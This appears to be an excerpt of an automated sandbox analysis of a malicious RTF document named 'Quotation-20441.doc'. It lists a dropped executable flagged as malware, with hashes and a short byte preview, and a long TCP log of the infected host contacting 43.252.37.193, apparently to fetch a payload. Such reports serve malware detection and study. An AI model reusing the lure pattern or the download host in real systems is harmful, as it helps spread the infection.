                                                                                  SHA-512:B6D03C345F00A7860A6046CB8273C4FE2C42FC0E6B2CA81B834B26F53BB649F3A4EE91FB264A06BBBAFDAD90621BB60415627818FCD209A1AE4E07CC2C996E88
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 27%
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...6+.`..............P..P...........n... ........@.. ....................................@..................................m..O.................................................................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............j..............@..B.................m......H............j...............{...........................................0............(,...(-.........(.....o.....*.....................(/......(0......(1......(2......(3....*N..(....o....(4....*&..(5....*.s6........s7........s8........s9........s:........*....0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0...........~....o?....+..*&..(@....*...0..<........~.....(A.....,!r...p.....(B...oC...sD............~.....
                                                                                  C:\Users\user\Desktop\~$otation-20441.doc
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):162
                                                                                  Entropy (8bit):2.431160061181642
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                  MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                  SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                  SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                  SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                  Malicious:false
                                                                                  Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:Rich Text Format data, unknown version
                                                                                  Entropy (8bit):4.003726133022176
                                                                                  TrID:
                                                                                  • Rich Text Format (5005/1) 55.56%
                                                                                  • Rich Text Format (4004/1) 44.44%
                                                                                  File name:Quotation-20441.doc
                                                                                  File size:651883
                                                                                  MD5:a4a16a26c3c523df880322d2d67f94e9
                                                                                  SHA1:d6a0db01a060a2d6f450695df09f58c532679992
                                                                                  SHA256:cdd4f66fe598fb83c5499682a71f8b2de731adf92586da00920ff6aa41bc7fe6
                                                                                  SHA512:a6e6db1fac72065942b202650242d3a3cbe167d73b5c6b68be9a1869222b42929b3166925da4ac921d1ecab3a9b029a1e7bba6a143abe7949ce86be6be8c651d
                                                                                  SSDEEP:12288:Dz8/9DX5aSxShHESphBKyaqTpZuJTBFdjLqjNlbuWk5xi+td4LoJTcVPMS5HvlM:XytxqHESphI64PZLqj6WyxLt4CcBMS5G
                                                                                  File Content Preview:{\rtf5752{\object51636759\objemb\objw4221\objh4104{\*\objdata979526 {\*\mrSp0346133651.0346133651\*\.0346133651 \*\mrSp0346133651.0346133651\*\.0346133651} \..

                                                                                  File Icon

                                                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                                                  Static RTF Info

                                                                                  Objects

                                                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                  00000003Fhno

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 4, 2021 09:18:52.296397924 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.500590086 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.500699043 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.501035929 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.705144882 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.713819027 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.713841915 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.713854074 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.713865995 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.713877916 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.713898897 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.713911057 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.713926077 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.713938951 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.713943005 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.713958025 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.713967085 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.713969946 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.713985920 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.714004040 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.714015007 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.714024067 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.714123964 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.918039083 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.918112993 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.918152094 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.918178082 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.918205023 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.918214083 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.918232918 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.918247938 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.918258905 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.918289900 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.918328047 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.918348074 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:52.918376923 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.918384075 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.924722910 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:52.926049948 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.122481108 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.122651100 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.122721910 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.122744083 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.122757912 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.122776031 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.122798920 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.122829914 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.122845888 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.122859955 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.122874022 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.122890949 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.327256918 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327289104 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327305079 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327326059 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327351093 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327373981 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327394962 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327414036 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327536106 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.327555895 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.327615023 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.327708960 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.329418898 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.532179117 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.532234907 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.532289982 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.532344103 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.532404900 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.532444000 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.532461882 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.532531023 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.532562971 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.532622099 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.532674074 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.532821894 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.533720016 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.533843994 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.534715891 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.737176895 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.737200975 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.737217903 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.737234116 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.737246037 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.737266064 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.737284899 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.737309933 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.737317085 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.737320900 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.737334967 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.737339973 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.737426996 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.737987995 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.738049030 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.942565918 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.942590952 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.942603111 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.942622900 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.942641020 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.942656040 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.942679882 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.942770958 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.942787886 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.942790985 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.942791939 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.942795038 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.942876101 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.942879915 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:53.943001032 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:53.943063021 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.147150040 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.147171974 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.147185087 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.147207022 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.147233009 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.147244930 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.147258043 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.147442102 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.147456884 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.147461891 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.148914099 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.351924896 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.351948977 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.351960897 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.351972103 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.351983070 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.351999998 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.352015972 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.352134943 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.352189064 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.352193117 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.352195978 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.564213037 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.564244986 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.564261913 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.564277887 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.564294100 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.564311028 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.564326048 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.564342976 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.564383030 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.564435005 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.564440012 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.564441919 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.564445019 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.564482927 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.564488888 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.568866014 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.771658897 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.771708012 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.771745920 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.771785021 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.771797895 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.771846056 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.773351908 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.773422956 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.773443937 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.773483038 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.773489952 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.773541927 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.976265907 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.976326942 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.976363897 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.976412058 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.976558924 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:54.977721930 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.977763891 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:54.977889061 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.181305885 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.181380033 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.181405067 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.181459904 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.181461096 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.181543112 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.182324886 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.182370901 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.182390928 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.182408094 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.182423115 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.182460070 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.386001110 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.386060953 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.386105061 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.386111975 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.386145115 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.386172056 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.386852980 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.386895895 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.386929035 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.388897896 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.590769053 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.590924025 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.590991974 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.591018915 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.795275927 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.795347929 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.795399904 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.795526981 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.795579910 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.795586109 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:55.999922037 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:55.999957085 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.003340960 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.003372908 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.207668066 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.207918882 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.208220959 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.208244085 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.208290100 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.209006071 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.413619041 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.413687944 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.413904905 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.414297104 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.414439917 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.618266106 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.618324041 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.618603945 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.618632078 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.618721962 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:56.824084997 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.824126959 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.824162006 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.824210882 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:56.824398994 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:57.028876066 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.028903008 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.028919935 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.028943062 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.029012918 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:57.029041052 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:57.233369112 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.233412027 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.233428955 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.233445883 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.235189915 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:57.439923048 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.439968109 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.440005064 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.440016985 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.440192938 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:57.440227985 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:57.644644976 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.644680023 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.644696951 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.644712925 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.644725084 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.644737005 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.644965887 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:57.849536896 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.849570990 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.849591970 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.849611998 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.849631071 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.849652052 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:57.849718094 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:57.849745989 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.054567099 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.054596901 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.054617882 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.054641008 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.054662943 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.054672003 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.054680109 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.054682970 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.054686069 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.054708004 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.057118893 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.258960962 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.259017944 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.259062052 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.259104967 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.259145975 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.259185076 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.259274960 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.259303093 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.463948965 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.464010954 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.464037895 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.464071989 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.464107037 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.464153051 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.464174986 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.464196920 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.464205980 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.464219093 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.464243889 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.464272022 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.464312077 CET4916780192.168.2.2243.252.37.193
                                                                                  Feb 4, 2021 09:18:58.668719053 CET804916743.252.37.193192.168.2.22
                                                                                  Feb 4, 2021 09:18:58.668766975 CET804916743.252.37.193192.168.2.22
